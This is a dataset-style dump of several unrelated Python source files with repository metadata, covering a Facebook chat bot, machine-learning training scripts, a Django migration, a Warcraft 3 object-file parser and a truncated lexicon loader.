] | 1 | 2018-03-06T05:34:07.000Z | 2018-03-07T19:51:18.000Z | bot.py | liamkirsh/FBChatBot | 59eafee2c78f2d6a93c38a74fecf1a4d311a00e9 | [
"MIT"
] | null | null | null | from collections import namedtuple
from fbchat import Client
from fbchat.models import ThreadType
class Bot(Client):
Command = namedtuple('Command', ['func', 'admin', 'directed'])
def __init__(self, email, password, name, admins=[], protected=[], *args, **kwargs):
super(Bot, self).__init__(email=email, password=password,
*args, **kwargs)
self.name = name
self.protected = protected + admins
self.admins = admins
self.commands = {}
self.add_message_handler("help", self.commands_cmd)
def commands_cmd(self, msg):
"""Print this message."""
def get_commands():
return self.commands.iteritems()
commands_msg = "You can say:\n"
for kword, cmd in sorted(get_commands(), key=lambda x: x[1].admin):
admin_msg = " (admin only)" if cmd.admin else ""
commands_msg += "{}:{} {}\n".format(kword, admin_msg, cmd.func.__doc__)
self.sendMessage(commands_msg, msg['thread_id'], msg['thread_type'])
def add_message_handler(self, kword, func, admin=False, directed=True):
self.commands[kword] = Bot.Command(func, admin, directed)
def onMessage(self, **kwargs):
super(Bot, self).onMessage(**kwargs)
if kwargs['author_id'] == self.uid:
return
is_admin = kwargs['author_id'] in self.admins
is_directed = kwargs['message'].startswith("@" + self.name)
is_dm = kwargs['thread_type'] == ThreadType.USER
if is_directed:
kwargs['message'] = kwargs['message'].split("@" + self.name)[1].strip()
kword = kwargs['message'].split(' ', 1)[0].lower()
cmd = self.commands.get(kword)
if (cmd and (not cmd.admin or is_admin)
and (not cmd.directed or is_directed or is_dm)):
cmd.func(kwargs)
| 38.510204 | 88 | 0.598304 | 227 | 1,887 | 4.810573 | 0.325991 | 0.054945 | 0.029304 | 0.043956 | 0.049451 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002861 | 0.259141 | 1,887 | 48 | 89 | 39.3125 | 0.778255 | 0.010069 | 0 | 0 | 0 | 0 | 0.077873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.054054 | 0.081081 | 0.027027 | 0.324324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5bdc2fd22c992b2cd181d55011e5aa6b716ab9f | 80 | py | Python | devices/windows_wsl.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | null | null | null | devices/windows_wsl.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | 1 | 2019-02-03T17:06:21.000Z | 2019-02-03T17:06:21.000Z | devices/windows_wsl.py | mgualco-contractor/boardfarm | 6a033e5dc84c7368fdd8ec2738b08b35ca7b07e7 | [
"BSD-3-Clause-Clear"
] | 1 | 2020-03-05T01:58:34.000Z | 2020-03-05T01:58:34.000Z | import debian
class WindowsWSL(debian.DebianBox):
model = ('windows_wsl')
| 13.333333 | 35 | 0.725 | 9 | 80 | 6.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 80 | 5 | 36 | 16 | 0.850746 | 0 | 0 | 0 | 0 | 0 | 0.1375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 4 |
e5bfc9b67168b7368cc1fe061546a71eda82eb03 | 242 | py | Python | zeroshot_topics/utils.py | charyeezy/zeroshot_topics | c77b12fcd82b87703eb6e92d6eac6d741c4de59f | [
"Apache-2.0",
"MIT"
] | 49 | 2021-11-21T08:33:05.000Z | 2022-03-11T22:47:00.000Z | zeroshot_topics/utils.py | charyeezy/zeroshot_topics | c77b12fcd82b87703eb6e92d6eac6d741c4de59f | [
"Apache-2.0",
"MIT"
] | 4 | 2021-11-22T13:54:44.000Z | 2022-01-07T19:43:08.000Z | zeroshot_topics/utils.py | charyeezy/zeroshot_topics | c77b12fcd82b87703eb6e92d6eac6d741c4de59f | [
"Apache-2.0",
"MIT"
] | 4 | 2021-11-22T18:39:45.000Z | 2022-02-24T05:11:56.000Z | from functools import lru_cache
from transformers import pipeline
@lru_cache
def load_zeroshot_model(model_name="valhalla/distilbart-mnli-12-6"):
classifier = pipeline("zero-shot-classification", model=model_name)
return classifier
| 26.888889 | 71 | 0.805785 | 32 | 242 | 5.90625 | 0.6875 | 0.084656 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013953 | 0.11157 | 242 | 8 | 72 | 30.25 | 0.865116 | 0 | 0 | 0 | 0 | 0 | 0.219008 | 0.219008 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e5c0e09f7a45cb2ecf9eba32890f4af165a441f0 | 273 | py | Python | Draft/Decode a cipher.py | mwk0408/codewars_solutions | 9b4f502b5f159e68024d494e19a96a226acad5e5 | [
"MIT"
] | 6 | 2020-09-03T09:32:25.000Z | 2020-12-07T04:10:01.000Z | Draft/Decode a cipher.py | mwk0408/codewars_solutions | 9b4f502b5f159e68024d494e19a96a226acad5e5 | [
"MIT"
] | 1 | 2021-12-13T15:30:21.000Z | 2021-12-13T15:30:21.000Z | Draft/Decode a cipher.py | mwk0408/codewars_solutions | 9b4f502b5f159e68024d494e19a96a226acad5e5 | [
"MIT"
] | null | null | null | table={i:j for i,j in enumerate("abcdefghijklmnopqrstuvwxyz"+"abcdefghijklmnopqrstuvwxyz".upper())}
def decode(cipher, b, c):
cipher.insert(0, 0)
res=[]
for i in range(1, len(cipher)):
res.append(table[cipher[i]-cipher[i-1]-b-c])
return "".join(res) | 39 | 99 | 0.655678 | 41 | 273 | 4.365854 | 0.536585 | 0.022346 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017391 | 0.157509 | 273 | 7 | 100 | 39 | 0.76087 | 0 | 0 | 0 | 0 | 0 | 0.189781 | 0.189781 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5c1039cda0312feb3e593ae896f87fa3acd4dcc | 53 | py | Python | src/HABApp/rule/scheduler/__init__.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 44 | 2018-12-13T08:46:44.000Z | 2022-03-07T03:23:21.000Z | src/HABApp/rule/scheduler/__init__.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 156 | 2019-03-02T20:53:31.000Z | 2022-03-23T13:13:58.000Z | src/HABApp/rule/scheduler/__init__.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 18 | 2019-03-08T07:13:21.000Z | 2022-03-22T19:52:31.000Z | from .habappschedulerview import HABAppSchedulerView
| 26.5 | 52 | 0.90566 | 4 | 53 | 12 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 53 | 1 | 53 | 53 | 0.979592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5c143fee608434a37b93838fcca4dd45eb0545b | 627 | py | Python | cases/migrations/0002_auto_20200506_2202.py | testyourcodenow/core | 05865b02ff7e60ffd3b30652161b3523046b9696 | [
"MIT"
] | 1 | 2020-05-10T06:40:58.000Z | 2020-05-10T06:40:58.000Z | cases/migrations/0002_auto_20200506_2202.py | testyourcodenow/core | 05865b02ff7e60ffd3b30652161b3523046b9696 | [
"MIT"
] | 25 | 2020-05-03T08:10:38.000Z | 2021-09-22T18:59:29.000Z | cases/migrations/0002_auto_20200506_2202.py | testyourcodenow/core | 05865b02ff7e60ffd3b30652161b3523046b9696 | [
"MIT"
] | 10 | 2020-05-03T08:25:56.000Z | 2020-06-03T06:49:34.000Z | # Generated by Django 3.0.3 on 2020-05-06 22:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cases', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='visual',
name='id',
field=models.AutoField(auto_created=True, default=4, primary_key=True, serialize=False, verbose_name='ID'),
preserve_default=False,
),
migrations.AlterField(
model_name='visual',
name='country',
field=models.CharField(max_length=255),
),
]
| 25.08 | 119 | 0.586922 | 66 | 627 | 5.454545 | 0.712121 | 0.05 | 0.083333 | 0.105556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052036 | 0.295056 | 627 | 24 | 120 | 26.125 | 0.762443 | 0.07177 | 0 | 0.222222 | 1 | 0 | 0.068966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5c399ccf40bc25cefef6274b5920b5a4ae32549 | 7,048 | py | Python | dssm/train.py | nlpming/tensorflow-DSMM | dc982cc49bf03f474da2895e4dd4fb37061c0271 | [
"MIT"
] | null | null | null | dssm/train.py | nlpming/tensorflow-DSMM | dc982cc49bf03f474da2895e4dd4fb37061c0271 | [
"MIT"
] | null | null | null | dssm/train.py | nlpming/tensorflow-DSMM | dc982cc49bf03f474da2895e4dd4fb37061c0271 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#encoding=utf-8
'''
@Time : 2020/10/25 22:28:30
@Author : zhiyang.zzy
@Contact : zhiyangchou@gmail.com
@Desc : 训练相似度模型
1. siamese network,分别使用 cosine、曼哈顿距离
2. triplet loss
'''
# here put the import lib
from model.bert_classifier import BertClassifier
import os
import time
from numpy.lib.arraypad import pad
import nni
from tensorflow.python.ops.gen_io_ops import write_file
import yaml
import logging
import argparse
logging.basicConfig(level=logging.INFO)
import data_input
from config import Config
from model.siamese_network import SiamenseRNN, SiamenseBert
from data_input import Vocabulary, get_test
from util import write_file
def train_siamese():
# 读取配置
# conf = Config()
cfg_path = "./configs/config.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
# 读取数据
data_train, data_val, data_test = data_input.get_lcqmc()
# data_train = data_train[:100]
print("train size:{},val size:{}, test size:{}".format(
len(data_train), len(data_val), len(data_test)))
model = SiamenseRNN(cfg)
model.fit(data_train, data_val, data_test)
pass
def predict_siamese(file_='./results/'):
# 加载配置
cfg_path = "./configs/config.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
# 将 seq转为id,
vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
test_arr, query_arr = get_test(file_, vocab)
# 加载模型
model = SiamenseRNN(cfg)
model.restore_session(cfg["checkpoint_dir"])
test_label, test_prob = model.predict(test_arr)
out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)]
write_file(out_arr, file_ + '.siamese.predict', )
pass
def train_siamese_bert():
# 读取配置
# conf = Config()
cfg_path = "./configs/config_bert.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
# 自动调参的参数,每次会更新一组搜索空间中的参数
tuner_params= nni.get_next_parameter()
cfg.update(tuner_params)
# vocab: 将 seq转为id,
vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
# 读取数据
data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab)
# data_train = data_train[:100]
print("train size:{},val size:{}, test size:{}".format(
len(data_train), len(data_val), len(data_test)))
model = SiamenseBert(cfg)
model.fit(data_train, data_val, data_test)
pass
def predict_siamese_bert(file_="./results/input/test"):
# 读取配置
# conf = Config()
cfg_path = "./configs/config_bert.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
os.environ["CUDA_VISIBLE_DEVICES"] = "4"
# vocab: 将 seq转为id,
vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
# 读取数据
test_arr, query_arr = data_input.get_test_bert(file_, vocab)
print("test size:{}".format(len(test_arr)))
model = SiamenseBert(cfg)
model.restore_session(cfg["checkpoint_dir"])
test_label, test_prob = model.predict(test_arr)
out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)]
write_file(out_arr, file_ + '.siamese.bert.predict', )
pass
def train_bert():
# 读取配置
# conf = Config()
cfg_path = "./configs/bert_classify.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
# 自动调参的参数,每次会更新一组搜索空间中的参数
tuner_params= nni.get_next_parameter()
cfg.update(tuner_params)
# vocab: 将 seq转为id,
vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
# 读取数据
data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab, is_merge=1)
# data_train = data_train[:100]
print("train size:{},val size:{}, test size:{}".format(
len(data_train), len(data_val), len(data_test)))
model = BertClassifier(cfg)
model.fit(data_train, data_val, data_test)
pass
def predict_bert(file_="./results/input/test"):
# 读取配置
# conf = Config()
cfg_path = "./configs/bert_classify.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
# vocab: 将 seq转为id,
vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
# 读取数据
test_arr, query_arr = data_input.get_test_bert(file_, vocab, is_merge=1)
print("test size:{}".format(len(test_arr)))
model = BertClassifier(cfg)
model.restore_session(cfg["checkpoint_dir"])
test_label, test_prob = model.predict(test_arr)
out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)]
write_file(out_arr, file_ + '.bert.predict', )
pass
def siamese_bert_sentence_embedding(file_="./results/input/test.single"):
# 输入一行是一个query,输出是此query对应的向量
# 读取配置
cfg_path = "./configs/config_bert.yml"
cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader)
cfg['batch_size'] = 64
os.environ["CUDA_VISIBLE_DEVICES"] = "7"
# vocab: 将 seq转为id,
vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]')
# 读取数据
test_arr, query_arr = data_input.get_test_bert_single(file_, vocab)
print("test size:{}".format(len(test_arr)))
model = SiamenseBert(cfg)
model.restore_session(cfg["checkpoint_dir"])
test_label = model.predict_embedding(test_arr)
test_label = [",".join([str(y) for y in x]) for x in test_label]
out_arr = [[x, test_label[i]] for i, x in enumerate(query_arr)]
print("write to file...")
write_file(out_arr, file_ + '.siamese.bert.embedding', )
pass
if __name__ == "__main__":
os.environ["CUDA_VISIBLE_DEVICES"] = "4"
ap = argparse.ArgumentParser()
ap.add_argument("--method", default="bert", type=str, help="train/predict")
ap.add_argument("--mode", default="train", type=str, help="train/predict")
ap.add_argument("--file", default="./results/input/test", type=str, help="train/predict")
args = ap.parse_args()
if args.mode == 'train' and args.method == 'rnn':
train_siamese()
elif args.mode == 'predict' and args.method == 'rnn':
predict_siamese(args.file)
elif args.mode == 'train' and args.method == 'bert_siamese':
train_siamese_bert()
elif args.mode == 'predict' and args.method == 'bert_siamese':
predict_siamese_bert(args.file)
elif args.mode == 'train' and args.method == 'bert':
train_bert()
elif args.mode == 'predict' and args.method == 'bert':
predict_bert(args.file)
elif args.mode == 'predict' and args.method == 'bert_siamese_embedding':
# 此处输出句子的 embedding,如果想要使用向量召回
# 建议训练模型的时候,损失函数使用功能和faiss一致的距离度量,例如faiss中使用是l2,那么损失函数用l2
# faiss距离用cos,损失函数用cosin,或者损失中有一项是cosin相似度损失
siamese_bert_sentence_embedding(args.file)
| 40.045455 | 119 | 0.678065 | 1,001 | 7,048 | 4.541459 | 0.16983 | 0.029696 | 0.025737 | 0.021557 | 0.715794 | 0.703256 | 0.678179 | 0.658821 | 0.630004 | 0.601408 | 0 | 0.008202 | 0.169694 | 7,048 | 175 | 120 | 40.274286 | 0.768626 | 0.109393 | 0 | 0.512397 | 0 | 0 | 0.172309 | 0.035617 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057851 | false | 0.057851 | 0.115702 | 0 | 0.173554 | 0.057851 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
e5c7a4ae568522e409aa3f1c6efdf5afa6011ded | 6,517 | py | Python | train_blstm_e2e.py | ishine/E2E-langauge-diarization | 0bcb3ec82bd6de6fac848c66fd5ad8fe7b284f0e | [
"MIT"
] | 4 | 2021-12-13T10:24:23.000Z | 2021-12-22T09:40:58.000Z | train_blstm_e2e.py | ishine/E2E-langauge-diarization | 0bcb3ec82bd6de6fac848c66fd5ad8fe7b284f0e | [
"MIT"
] | null | null | null | train_blstm_e2e.py | ishine/E2E-langauge-diarization | 0bcb3ec82bd6de6fac848c66fd5ad8fe7b284f0e | [
"MIT"
] | 2 | 2021-04-07T02:34:17.000Z | 2021-04-23T03:33:54.000Z | import os
import random
import argparse
import torch
import torch.nn as nn
import numpy as np
from torch.utils.data import DataLoader
from tqdm import tqdm
from model import *
from Loss import *
from data_load import *
from model_evaluation import *
#python train_blstm_e2e.py --savedir "/home/hexin/Desktop/models" --train "/home/hexin/Desktop/data/train.txt" --test "/home/hexin/Desktop/data/test.txt"
# --seed 0 --device 0 --batch 8 --epochs 60 --dim 23 --lang 3 --model my_sa_e2e --lr 0.00001 --lambda 0.5
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def get_lr(optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
def get_output(outputs, seq_len):
output_ = 0
for i in range(len(seq_len)):
length = seq_len[i]
output = outputs[i, :length, :]
if i == 0:
output_ = output
else:
output_ = torch.cat((output_, output), dim=0)
return output_
def main():
parser = argparse.ArgumentParser(description='paras for making data')
parser.add_argument('--model', type=str, help='model name', default='my_BLSTM')
parser.add_argument('--savedir', type=str, help='dir in which the trained model is saved')
parser.add_argument('--train', type=str, help='training data, in .txt')
parser.add_argument('--test', type=str, help='testing data, in .txt')
parser.add_argument('--seed', type=int, help='Device name', default=0)
parser.add_argument('--batch', type=int, help='batch size', default=8)
parser.add_argument('--device', type=int, help='Device name', default=0)
parser.add_argument('--epochs', type=int, help='num of epochs', default=120)
parser.add_argument('--dim', type=int, help='dim of input features', default=437)
parser.add_argument('--lang', type=int, help='num of language classes', default=3)
parser.add_argument('--lr', type=float, help='initial learning rate', default=0.0001)
parser.add_argument('--lambda', type=float, help='hyperparameter for joint training', default=0.5)
args = parser.parse_args()
setup_seed(args.seed)
device = torch.device('cuda:{}'.format(args.device) if torch.cuda.is_available() else 'cpu')
# load model
model = BLSTM_E2E_LID(n_lang=args.lang,
dropout=0.25,
input_dim=args.dim,
hidden_size=256,
num_emb_layer=2,
num_lstm_layer=3,
emb_dim=256)
model.to(device)
loss_func_DCL = DeepClusteringLoss().to(device)
loss_func_CRE = nn.CrossEntropyLoss().to(device)
# load data
train_txt = args.train
train_set = RawFeatures(train_txt)
valid_txt = args.test
valid_set = RawFeatures(valid_txt)
train_data = DataLoader(dataset=train_set,
batch_size=args.batch,
pin_memory=True,
num_workers=16,
shuffle=True,
collate_fn=collate_fn)
valid_data = DataLoader(dataset=valid_set,
batch_size=1,
pin_memory=True,
shuffle=False,
collate_fn=collate_fn)
# optimizer & learning rate decay strategy
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
T_max = args.epochs
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=T_max)
# Train the model
total_step = len(train_data)
best_acc = 0
for epoch in tqdm(range(args.epochs)):
loss_item = 0
model.train()
for step, (utt, labels, seq_len) in enumerate(train_data):
utt_ = utt.to(device=device, dtype=torch.float)
utt_ = rnn_utils.pack_padded_sequence(utt_, seq_len, batch_first=True)
labels_ = rnn_util.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device)
# Forward pass
outputs, embeddings = model(utt_)
loss_DCL = loss_func_DCL(embeddings, labels_)
loss_CRE = loss_func_CRE(outputs, labels_)
loss = args.lambda * loss_CRE + (1 - args.lambda) * loss_DCL
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if step % 200 == 0:
print("Epoch [{}/{}], Step [{}/{}] Loss: {:.4f} CRE: {:.4f} DCL: {:.4f}"
.format(epoch + 1, args.epochs, step + 1, total_step, loss.item(), loss_CRE.item(), loss_DCL.item()))
scheduler.step()
model.eval()
correct = 0
total = 0
eer = 0
FAR_list = torch.zeros(args.lang)
FRR_list = torch.zeros(args.lang)
with torch.no_grad():
for step, (utt, labels, seq_len) in enumerate(valid_data):
utt = utt.to(device=device, dtype=torch.float)
utt_ = rnn_utils.pack_padded_sequence(utt, seq_len, batch_first=True)
labels_ = rnn_util.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device)
outputs, embeddings = model(utt_)
predicted = torch.argmax(outputs,-1)
total += labels.size(-1)
correct += (predicted == labels_).sum().item()
FAR, FRR = compute_far_frr(args.lang, predicted, labels_)
FAR_list += FAR
FRR_list += FRR
acc = correct / total
print('Current Acc.: {:.4f} %'.format(100 * acc))
for i in range(args.lang):
eer_ = (FAR_list[i] / total + FRR_list[i] / total) / 2
eer += eer_
print("EER for label {}: {:.4f}%".format(i, eer_ * 100))
print('EER: {:.4f} %'.format(100 * eer / args.lang))
if acc > best_acc:
print('New best Acc.: {:.4f}%, EER: {:.4f} %, model saved!'.format(100 * acc, 100 * eer / args.lang))
best_acc = acc
best_eer = eer / args.lang
torch.save(model.state_dict(), '/home/hexin/Desktop/models/' + '{}.ckpt'.format(args.model))
print('Final Acc: {:.4f}%, Final EER: {.4f}%'.format(100 * best_acc, 100 * best_eer))
if __name__ == "__main__":
main()
| 43.446667 | 153 | 0.588154 | 829 | 6,517 | 4.437877 | 0.247286 | 0.029356 | 0.05545 | 0.017396 | 0.164719 | 0.144061 | 0.129927 | 0.129927 | 0.111987 | 0.111987 | 0 | 0.02124 | 0.284794 | 6,517 | 149 | 154 | 43.738255 | 0.768076 | 0.060457 | 0 | 0.062016 | 0 | 0 | 0.099918 | 0.004415 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.093023 | null | null | 0.046512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5c851fb9a85bd589c9d3056d5470e792ff6484e | 2,551 | py | Python | war3structs/objects.py | sides/war3structs | 171c91240346e610e22cf10bab0c6d526996f855 | [
"MIT"
] | 10 | 2019-12-07T12:10:13.000Z | 2022-02-24T12:45:32.000Z | war3structs/objects.py | warlockbrawl/war3structs | 171c91240346e610e22cf10bab0c6d526996f855 | [
"MIT"
] | null | null | null | war3structs/objects.py | warlockbrawl/war3structs | 171c91240346e610e22cf10bab0c6d526996f855 | [
"MIT"
] | 3 | 2020-02-28T12:43:26.000Z | 2020-06-08T23:31:29.000Z | from construct import *
from .common import *
"""
Formats: w3u, w3t, w3b, w3h, w3d, w3a, w3q
Version: 1
The objects file contains data that the object editor would typically
manipulate. If dealing with abilities, doodads or upgrades, the
ObjectsWithVariationsFile is used instead of the ObjectsFile.
Optionally, the ObjectsBestFitFile can be used as well which tries to
parse the file with both formats--one should always fail when used
with the other, so it selects whichever didn't fail. Performance
should be really bad on this.
"""
class ObjectModificationTerminatorValidator(Validator):
def _validate(self, obj, ctx, path):
return obj in [b"\x00\x00\x00\x00", ctx._.new_object_id, ctx._.original_object_id]
ObjectModification = Struct(
"modification_id" / ByteId,
"value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3),
"value" / Switch(this.value_type, {
"INT" : Integer,
"REAL" : Float,
"UNREAL" : Float,
"STRING" : String
}),
"parent_object_id" / ObjectModificationTerminatorValidator(ByteId)
)
ObjectDefinition = Struct(
"original_object_id" / ByteId,
"new_object_id" / ByteId,
"modifications_count" / Integer,
"modifications" / Array(this.modifications_count, ObjectModification)
)
ObjectTable = Struct(
"objects_count" / Integer,
"objects" / Array(this.objects_count, ObjectDefinition)
)
ObjectsFile = Struct(
"version" / Integer,
"original_objects_table" / ObjectTable,
"custom_objects_table" / ObjectTable
)
ObjectModificationWithVariation = Struct(
"modification_id" / ByteId,
"value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3),
"variation" / Integer,
"ability_data_column" / Enum(Integer, A=0, B=1, C=2, D=3, F=4, G=5, H=6),
"value" / Switch(this.value_type, {
"INT" : Integer,
"REAL" : Float,
"UNREAL" : Float,
"STRING" : String
}),
"parent_object_id" / ObjectModificationTerminatorValidator(ByteId)
)
ObjectDefinitionWithVariations = Struct(
"original_object_id" / ByteId,
"new_object_id" / ByteId,
"modifications_count" / Integer,
"modifications" / Array(this.modifications_count, ObjectModificationWithVariation)
)
ObjectTableWithVariations = Struct(
"objects_count" / Integer,
"objects" / Array(this.objects_count, ObjectDefinitionWithVariations)
)
ObjectsWithVariationsFile = Struct(
"version" / Integer,
"original_objects_table" / ObjectTableWithVariations,
"custom_objects_table" / ObjectTableWithVariations
)
ObjectsBestFitFile = Select(ObjectsWithVariationsFile, ObjectsFile)
| 30.369048 | 86 | 0.73579 | 287 | 2,551 | 6.390244 | 0.428571 | 0.034896 | 0.030534 | 0.028353 | 0.430752 | 0.430752 | 0.387132 | 0.387132 | 0.387132 | 0.329335 | 0 | 0.014365 | 0.154057 | 2,551 | 83 | 87 | 30.73494 | 0.835496 | 0 | 0 | 0.466667 | 0 | 0 | 0.214391 | 0.021537 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.033333 | 0.016667 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5c8fc169ab19e9767386e1463980ba6e2c72681 | 3,078 | py | Python | lexicon.py | adamlek/swedish-lexical-blends | 5189bcc1680fda5ac32637dd63b895c091b56997 | [
"MIT"
] | null | null | null | lexicon.py | adamlek/swedish-lexical-blends | 5189bcc1680fda5ac32637dd63b895c091b56997 | [
"MIT"
] | null | null | null | lexicon.py | adamlek/swedish-lexical-blends | 5189bcc1680fda5ac32637dd63b895c091b56997 | [
"MIT"
] | null | null | null | import pickle
from collections import defaultdict
from helper_functions import format_lemma, get_blends_csv
from os import listdir
import networkx as nx
def saldo_obj(filename):
saldo = defaultdict(int)
with open(filename) as f:
for line in f:
if line.startswith('#'):
continue
line = line.split('\t')
pos = line[-2].upper()
lemma_id = line[0]
lemma = line[0].split('..')[0].lower()
mother = line[1]
father = line[2]
saldo[lemma] = (pos, father, mother, lemma_id)
return saldo
# def construct_network(saldo):
# G = nx.DiGraph()
# for k, (_, m, f, li) in saldo.items():
# if m not in G.nodes:
# G.add_node(m)
# if f not in G.nodes:
# G.add_node(m)
# if li not in G.nodes:
# G.add_node(li)
# if k not in G.nodes:
# G.add('_' + k)
# if G.has_edge(li, k):
